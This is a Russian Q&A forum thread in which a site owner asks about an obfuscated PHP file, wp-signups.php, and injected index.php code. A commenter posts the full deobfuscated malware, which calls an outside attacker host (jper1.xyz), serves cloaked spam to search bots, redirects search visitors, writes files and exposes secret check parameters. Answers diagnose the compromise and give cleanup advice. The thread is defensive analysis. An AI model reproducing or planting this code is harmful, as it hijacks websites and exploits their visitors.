Непонятная дичь на сайтах с одного хостинга. wp-signups.php что происходит?

Question

[Иван Петров]

На сайте, управляемом WordPress появился файл с именем wp-signups.php и совершенно непонятным содержимым. Именно wp-signuPS, а не wp-signuP. Он появился не только на сайте, управляемом WordPress, но и на других сайтах, которые к WordPress не имеют никакого отношения, но находятся на одном аккаунте хостинга и не пересекаются друг с другом.

В этом файле какой то непонятный код и я не понимаю, какую функцию он выполняет. Полностью этот код вставить прямо сюда не могу из за ограничения на количество символов, поэтому размещу его по ссылке.

Кроме того что этот код в файлах wp-signups.php, он и в файлах index.php в самом верху.

На сколько я понял, в переменной $OoooOO0

$OOOOOO = '8111m3';$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c";

алфавит и цифры? И дальше из этого массива $OOOOOO заполняются значения других переменных или что вообще происходит? Пока не понял но возникли подозрения, что сайты взломали и настроили редиректы при определенных условиях, а чтобы это было максимально непонятно - привели код к такому замороченному виду?

У меня самого редирект при посещении сайта не происходит, на одном сайте испортили код в index.php и он у меня загружался в искаженном виде, на втором сайте вообще пустая страница грузилась, а на третьем испорчен .htaccess и вижу ошибку 500 при попытке попасть на сайт.

Такое ощущение что кто то получил доступ к хостингу и нагородил черти что, или что еще могло произойти? Помогите пожалуйста разобраться и понять что делает код, приведенный выше.

Comments

[Сергей delphinpro]

расшифровывать лень, но и так ясно, что это скорее всего шелл вам залили через какую-то уязвимость. Могут спам рассылать с вашего сервера, или еще что похуже. Зачищайте. И ищите уязвимость.

[Sergo Zar]

Насколько я понял: у тебя берутся все get запросы и пересылаются на другой сайт.

[Sergo Zar]

И кажется я сейчас все декодирую) тк понял как оно устроено

[Иван Петров]

Sergo Zar, правильно ли я понял, что пересылка get запросов это к примеру, когда люди по рекламе приходят с utm метками - эти метки пересылаются? Т.е. кто то решил вынюхать рекламу, или что?
Получилось узнать, куда пересылка происходила?

[Sergo Zar]

Иван Петров, насколько я понял то сюда 8111m3.jper1.xyz

вот расшифрованый код(переменные и названия функций заменил на более понятные имена, по моему мнению):

<?php
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
$b_8111m3 = '8111m3';
$symbols = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c";
/* qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?> <.-=:/1230654879';()&^$[]\\%{}!*|*/
$url_symbols = urldecode($symbols);
date_default_timezone_set('PRC');
$document_root = @$_SERVER['DOCUMENT_ROOT'];
$request_uri = @$_SERVER['REQUEST_URI'];
$http_host = @$_SERVER['HTTP_HOST'];
$http_accepT_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$http_user_agent = @$_SERVER['HTTP_USER_AGENT'];
$http_referer = @$_SERVER['HTTP_REFERER'];

$http_s = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$site = $http_s.$http_host;
$http_user_agent = @strtolower($http_user_agent);
$http_referer = @strtolower($http_referer);
if (getenv('HTTP_CLIENT_IP')) {
    $c = getenv('HTTP_CLIENT_IP');
} 
elseif (getenv('HTTP_X_FORWARDED_FOR')) {
    $c = getenv('HTTP_X_FORWARDED_FOR');
} 
elseif (getenv('REMOTE_ADDR')) {
    $c = getenv('REMOTE_ADDR');
} else {
    $c = $_SERVER['REMOTE_ADDR'];
}
if (isset($_GET['vf']) && $_GET['vf'] == 'online5566') {
    echo "domain online*";
    exit;
}
if (strstr($request_uri,'sitemap_index_')) {
    $c1 = dirname($request_uri);
    OooooOOOOoo($url_symbols, $b_8111m3, $site, $request_uri, $http_host, $http_s, $c1);
}
if (strstr($request_uri,'.xml')) {
    $c1 = dirname($request_uri);
    json_hz($url_symbols, $b_8111m3, $site, $request_uri, $http_s, $http_host, $c, $c1);
}
function OooooOOOOoo($url_symbols, $b_8111m3, $site, $request_uri, $http_host, $http_s, $c1){
    $site2 = 'http://'.$b_8111m3.'.jper1.xyz/Api/siteAllMap.php?page='.$request_uri.'&pwd=sl123&domain='.$site;
    if ($_GET['vf_allmap'] == 'online5566') {
        echo $site2;
        exit();  
    }
    $json_infa = json_decode(curl_hz($url_symbols, $site2), true);
    if (empty($json_infa) || $json_infa['code'] == 404) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    if (empty($json_infa) || $json_infa[code] == 444) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    $json_infa_data = $json_infa['data'];
    header('Content-type:text/xml');
    echo $json_infa_data;
    exit();
}
function json_hz($url_symbols, $b_8111m3, $site, $request_uri, $http_s, $http_host, $c, $c1 = '', $o0o0oo = ''){
    $site2 = 'http://'.$b_8111m3.'.jper1.xyz/Api/siteUrlApi.php?stype=sitemap&num=6000&pr='.$c1.'&url='.$request_uri.'&domain='.$site.'&ip='.$c;
    if ($_GET['vf_map'] == 'online5566') {
        echo $site2;
        exit();
    }
    $json_infa = json_decode(curl_hz($url_symbols, $site2), true);

    if (isset($json_infa[code]) && $json_infa[code] == 600) {
        $json_infa_data = $json_infa['data'];
        foreach ($json_infa_data as $url_symbolsog => $url_symbolsov) {
            $d = curl_hz($url_symbols, $url_symbolsov);
            $ok_error = (strpos($d,'Sitemap Notification Received') !== false) ? "OK" : 'ERROR';
            echo $url_symbolsov.'===>Submitting Google Sitemap:'.$ok_error.PHP_EOL;
        }    
        exit();
    }
    if (isset($json_infa[code]) && $json_infa[code] == 406) {
        echo 'Submitting Google Sitemap Return Fail';
        exit();
    }
    if (empty($json_infa) || $json_infa[code] == 404) {
        header('HTTP/1.0 404 Not Found');
        header('Status: 404 Not Found');
        exit();
    }
    $json_infa_data = $json_infa['data'];
    header('Content-type:text/xml');
    echo $json_infa_data;
    exit();
}
if (isset($_GET['google'])) {
    $get_google = $_GET['google'];

    if (preg_match('/^google.|?(\.html)$/i',$get_google)) {
        file_write($url_symbols,$get_google,'google-site-verification:'.' '.$get_google);
        exit('<a href='.$get_google.'>'.$get_google.'</a>');
    }
}
if (isset($_GET['robots'])) {
    $get_robots = $_GET['robots'];
    if (preg_match('/(\.php)$/i',$get_robots)) {
        $site = $site.'/'.$get_robots.'?'; 
    }
    else {
        $site = $site.'/';
    }
    file_write($url_symbols,'robots.txtUser-agent: |'.PHP_EOL.'Allow: /'.PHP_EOL.'Crawl-delay:3'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_1.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_2.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_3.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_4.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_5.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_6.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_7.xml'.PHP_EOL.'Sitemap:'.$site.'sitemap_index_8.xml');
    $content_robots_txt = file_get_contents('robots.txt');
    echo $content_robots_txt;
    exit();
}

if (preg_match('/google.co.jp|yahoo|google\.com[^.]|?$|bing/i',$http_referer)) {
    if ($_GET['vf_jump'] == online5566) {
        echo 'http://'.$b_8111m3.'.jper1.xyz/jump.php?domain='.$http_host.'&page='.$request_uri.'&bot=0&pr='.$c1.'&refer='.$http_referer.'&ip='.$c.'&lg='.$http_accepT_language;
        exit();
    }
    $f = curl_hz($url_symbols,'http://'.$b_8111m3.'.jper1.xyz/jump.php?domain='.$http_host.'&page='.$request_uri.'&bot=0&pr='.$c1.'&refer='.$http_referer.'&ip='.$c.'&lg='.$http_accepT_language);
    if ($f) {
        echo $f;
        exit();
    }
}
if (stristr($http_user_agent, 'googlebot') || stristr($http_user_agent, 'bing') || stristr($http_user_agent, 'Y*J') || stristr($http_user_agent, 'y*j') || stristr($http_user_agent, 'yahoo') || stristr($http_user_agent, 'google') || stristr($http_user_agent, 'Googlebot') || stristr($http_user_agent, 'googlebot')) {
    if ($_GET['vf_bot'] == online5566) {
        echo 'http://'.$b_8111m3.'.jper1.xyz/918.php?domain='.$http_host.'&page='.$request_uri.'&bot=1&pr='.$c1.'.&ip='.$c.'&lg='.$http_accepT_language;
        exit;
    }
    $g = curl_hz($url_symbols,'http://'.$b_8111m3.'.jper1.xyz/918.php?domain='.$http_host.'&page='.$request_uri.'&bot=1&pr='.$c1.'&ip='.$c.'&lg='.$http_accepT_language);
    
    if (!empty($g)) {
        $json_infa = json_decode($g, true);

        if ($json_infa[code] == 404) {
            header('HTTP/1.0 404 Not Found');
            header('Status: 404 Not Found');
            exit();
        }
        if ($json_infa[code] == 500) {
            header('HTTP/1.1 500 Internal Server Error');
            exit();
        }

        echo $g;
        exit();
    }
}
if ($_GET['vf_origin'] == 'online5566') {
    echo 'http://'.$b_8111m3.'.jper1.xyz/org.php?domain='.$http_host.'&page='.$request_uri.'&pr='.$c1.'&ip='.$c.'&lg='.$http_accepT_language;
    exit();
}

curl_hz($url_symbols,'http://'.$b_8111m3.'.jper1.xyz/org.php?domain='.$http_host.'&page='.$request_uri.'&pr='.$c1.'&ip='.$c.'&lg='.$http_accepT_language
);

function curl_hz($url_symbols, $url_){
    $g = '';
    $user__agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)';
    if (function_exists('curl_init')) {
        try {
            $curl_ = curl_init();
            $time_out = 30;
            curl_setopt($curl_, CURLOPT_URL, $url_);
            curl_setopt($curl_, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($curl_, CURLOPT_SSL_VERIFYPEER, 0);
            curl_setopt($curl_, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($curl_, CURLOPT_CONNECTTIMEOUT, $time_out);
            $g = curl_exec($curl_);
            curl_close($curl_); 
        }
        catch (Exception $e) {}
    }
    if (strlen($g) < 1 && function_exists('file_get_contents')) {
        ini_set('user_agent',$user__agent);

        try {
            $g = @file_get_contents($url_); 
        }
        catch (Exception $e) {}
    }
    return $g;
}

function file_write($url_symbols, $file_name, $file_text){
    $file_ = fopen($file_name,1) or die('0');
    fwrite($file_, $file_text);
    fclose($file_);
}
?>

[Sergo Zar]

Я немного добавил кода и увидел следующее

скрин

ссылка 8111m3.jper1.xyz/jump.php?domain=huy&page=/&bot=0&... привела меня на

эту

страницу
очевидно что это реламная фигня)

[Иван Петров]

Sergo Zar, т.е. скорее всего, цель взлома была сделать редирект на эту страницу?

[Sergo Zar]

Иван Петров, думаю да

[Иван Петров]

Aleksandr-JS-Developer, а какой в этом смысл? Если рекламная страница на иероглифическом языке, а трафик с русскоязычного сайта? Покупать из этого трафика никто ничего не будет из за разницы в тематике товаров и услуг и в языке, а поведенческие факторы ухудшатся - поисковым системам не понравится. Или в китайской байду поведенческие факторы не учитываются?

Answer 1

[Vindicar]

Обычный заобфусцированный шеллкод.
В конце кода видно обращение к curl, а потом fopen()+fwrite() - т.е. шелл умеет скачивать содержимое с указанного URL и записывать его в указанный файл на заражённом хостинге, предположительно для дальнейшего исполнения.

delphinpro в комментариях правильно написал: проверяйте дату изменения файлов (если хакер ленивый, он её не подправил и заражённые файлы будут новее), удаляйте шелл код отовсюду.
Я ещё добавлю: читайте логи вебсервера на предмет запросов к заражённым файлам, ищите хосты, которые обращались (наверняка китайские прокси). Потом ищите все запросы с этих хостов - если повезёт, поймёте как вас поломали. И в любом случае обновляйте вордпресс на последнюю версию, если это ещё не так.

Comments

[Иван Петров]

Спасибо за ответ, по датам файлы измененные обнаружил, но на всякий случай из бэкапа восстановил, вдруг даты все же подправили и таким образом замаскировали. А как производится изменение дат на хостинге?

[Vindicar]

Иван Петров, речь про те файлы, в которые могут писать php скрипты (читай, процесс веб-сервера). В пхп есть функция touch() для смены метки времени модификации на желаемую (по умолчанию на текущую).
Если хостинг вам подконтролен (свой физический сервер или VPS, а не просто веб-хостинг), можно попытаться закрыть пользователю, от которого запущен веб сервер, доступ на запись всюду, кроме необходимых каталогов (типа каталога для загружаемых файлов). Но сразу оговорюсь: я понятия не имею, какие директории должны быть разрешены на запись, чтобы не сломать работу вордпресса вообще и его обновлялки в частности.

Answer 2

[Konstantin]

Сайт взломан, залит какойто зловред.
Возможно он не один,
1. нужно найти и устранить уязвимость через которую он был залит
2. Вычистить зловреда.

Answer 3

[profesor08]

1. Смотри где раньше появился файл, это и будет дырявый сайт.
2. Смотри логи, может повезет и увидишь откуда обращаются к файлу, а там увидишь и куда еще обращаются с того адреса. Так поймешь, где примерно искать дыру.